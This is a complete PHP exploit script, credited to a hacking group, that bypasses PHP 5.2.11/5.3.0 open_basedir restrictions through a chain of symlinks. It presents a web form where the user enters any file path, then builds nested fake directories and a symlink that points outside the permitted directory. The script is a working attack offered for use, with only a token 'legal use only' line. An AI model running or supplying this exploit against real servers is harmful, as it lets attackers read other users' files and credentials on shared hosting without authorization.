<?php 
/* 
PHP 5.2.11/5.3.0 symlink() open_basedir bypass  
posted 3y HackTeach Loverz http://HackTeach.org/ 
i1t [ a.T] hotmail [ d0t] it 

CHUJWAMWMUZG 
*/ 

$fakedir="cx"; 
$fakedep=16; 

$num=0; // offset of symlink.$num 

if(!empty($_GET['file'])) $file=$_GET['file']; 
else if(!empty($_POST['file'])) $file=$_POST['file']; 
else $file=""; 

echo '<PRE><img 
src="http://www.hackteach.org/public/images/main.gif"><P>This is exploit 
from <a 
href="http://HackTeach.org" title="Hack Teach Loverz">Storm , DareDevil 
Lab - HackTeach</a> labs. 
posted by : storm 
<p>Script for legal use only. 
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass 
<p>More: <a href="http://HackTeach.org/">HackTeachLoverz</a> 
<p><form name="form" 
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF 
"]).'" method="post"><input type="text" name="file" size="50" 
value="'.htmlspecialchars($file).'"><input type="submit" name="hym" 
value="Create Symlink"></form>'; 

if(empty($file)) 
    exit; 

if(!is_writable(".")) 
    die("not writable directory"); 

$level=0; 

for($as=0;$as<$fakedep;$as++){ 
    if(!file_exists($fakedir)) 
        mkdir($fakedir); 
    chdir($fakedir); 
} 

while(1<$as--) chdir(".."); 

$hardstyle = explode("/", $file); 

for($a=0;$a<count($hardstyle);$a++){ 
    if(!empty($hardstyle[$a])){ 
        if(!file_exists($hardstyle[$a]))  
            mkdir($hardstyle[$a]); 
        chdir($hardstyle[$a]); 
        $as++; 
    } 
} 
$as++; 
while($as--) 
    chdir(".."); 

@rmdir("fakesymlink"); 
@unlink("fakesymlink"); 

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); 

// this loop will skip allready created symlinks. 
while(1) 
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, 
"symlink".$num))) break; 
    else $num++; 

@unlink("fakesymlink"); 
mkdir("fakesymlink"); 

die('<FONT COLOR="RED">check symlink <a 
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); 
?>